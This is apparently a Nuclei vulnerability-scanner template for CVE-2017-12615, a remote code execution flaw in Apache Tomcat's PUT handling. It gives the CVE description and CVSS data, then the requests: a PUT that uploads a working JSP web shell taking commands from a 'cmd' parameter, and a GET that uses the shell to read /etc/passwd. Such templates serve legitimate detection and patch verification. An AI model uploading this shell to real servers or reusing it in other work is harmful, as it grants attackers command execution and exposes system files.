nuclei-templates/cves/2017/CVE-2017-12615.yaml

60 lines
2.1 KiB
YAML

id: CVE-2017-12615
info:
name: Apache Tomcat RCE
author: pikpikcu
severity: high
description: |
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
reference:
- https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
- https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E
- http://www.securitytracker.com/id/1039392
- http://www.securityfocus.com/bid/100901
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-12615
cwe-id: CWE-434
tags: cve,cve2017,apache,rce,tomcat
requests:
- method: PUT
path:
- "{{BaseURL}}/poc.jsp/"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
- method: GET
path:
- "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200